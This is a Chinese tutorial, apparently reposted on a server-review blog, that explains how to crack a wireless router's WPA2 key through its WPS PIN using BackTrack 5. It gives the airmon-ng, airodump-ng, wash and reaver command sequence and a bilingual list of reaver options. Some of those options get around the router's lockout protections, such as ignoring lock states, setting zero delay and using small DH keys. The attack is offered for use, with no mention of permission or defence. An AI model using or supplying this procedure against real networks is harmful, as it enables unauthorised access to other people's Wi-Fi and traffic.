感谢支持
我们一直在努力

BackTrack5利用路由PIN码破解无线路由WPA2密钥

BackTrack5利用路由PIN码破解无线路由WPA2密钥

airmon-ng start wlan0 //将无线网卡设置为监控模式
airodump-ng -i mon0  //获得周围无线路由信息
wash -i mon0 -C      //查看支持PIN码破解的无线路由
reaver -i mon0 -b 路由MAC地址 -S -a -p 路由PIN码 -vv //开始PIN破解

Reaver v1.4的参数说明
 
  -i, –interface=<wlan>  Name of the monitor-mode interface to use
 
                          网卡的监视接口,通常是mon0
 
  -b, –bssid=<mac>      BSSID of the target AP
 
                          AP的MAC地址
 
Optional Arguments:
 
  -m, –mac=<mac>        MAC of the host system
 
                          指定本机MAC地址,在AP有MAC过滤的时候需要使用
 
  -e, –essid=<ssid>      ESSID of the target AP
 
                          路由器的ESSID,一般不用指定
 
  -c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)
 
                          信号的频道,如果不指定会自动扫描
 
  -o, –out-file=<file>  Send output to a log file [stdout]
 
                          标准输出到文件
 
  -s, –session=<file>    Restore a previous session file
 
                          恢复进程文件
 
  -C, –exec=<command>    Execute the supplied command upon successful pin recovery
 
                          pin成功后执行命令
 
  -D, –daemonize        Daemonize reaver
 
                          设置reaver成Daemon
 
  -a, –auto              Auto detect the best advanced options for the target AP
 
                          对目标AP自动检测高级参数
 
  -f, –fixed            Disable channel hopping
 
                          禁止频道跳转
 
  -5, –5ghz              Use 5GHz 802.11 channels
 
                          使用5G频道
 
  -v, –verbose          Display non-critical warnings (-vv for more)
 
                          显示不重要警告信息 -vv 可以显示更多
 
  -q, –quiet            Only display critical messages
 
                          只显示关键信息
 
  -h, –help              Show help
 
                          显示帮助
 

Advanced Options:
 
  -p, –pin=<wps pin>          Use the specified 4 or 8 digit WPS pin
 
                              直接读取psk
 
  -d, –delay=<seconds>        Set the delay between pin attempts [1]
 
                              pin间延时,默认1秒,推荐设0
 
  -l, –lock-delay=<seconds>  Set the time to wait if the AP locks WPS pin attempts [60]
 
                              AP锁定WPS后等待时间
 
  -g, –max-attempts=<num>    Quit after num pin attempts
 
                              最大pin次数
 
  -x, –fail-wait=<seconds>    Set the time to sleep after 10 unexpected failures [0]
 
                              10次意外失败后等待时间,默认0秒
 
  -r, –recurring-delay=<x:y>  Sleep for y seconds every x pin attempts
 
                              每x次pin后等待y秒
 
  -t, –timeout=<seconds>      Set the receive timeout period [5]
 
                              收包超时,默认5秒
 
  -T, –m57-timeout=<seconds>  Set the M5/M7 timeout period [0.20]
 
                              M5/M7超时,默认0.2秒
 
  -A, –no-associate          Do not associate with the AP (association must be done by another application)
 
                              不连入AP(连入过程必须有其他程序完成)
 
  -N, –no-nacks              Do not send NACK messages when out of order packets are received
 
                              不发送NACK信息(如果一直pin不动,可以尝试这个参数)
 
  -S, –dh-small              Use small DH keys to improve crack speed
 
                              使用小DH关键值提高速度(推荐使用)
 
  -L, –ignore-locks          Ignore locked state reported by the target AP
 
                              忽略目标AP报告的锁定状态
 
  -E, –eap-terminate          Terminate each WPS session with an EAP FAIL packet
 
                              每当收到EAP失败包就终止WPS进程

  -n, –nack                  Target AP always sends a NACK [Auto]
 
                              对目标AP总是发送NACK,默认自动
 
  -w, –win7                  Mimic a Windows 7 registrar [False]
 
                              模拟win7注册,默认关闭

赞(0) 打赏
转载请注明出处:服务器评测 » BackTrack5利用路由PIN码破解无线路由WPA2密钥
分享到: 更多 (0)

听说打赏我的人,都进福布斯排行榜啦!

支付宝扫一扫打赏

微信扫一扫打赏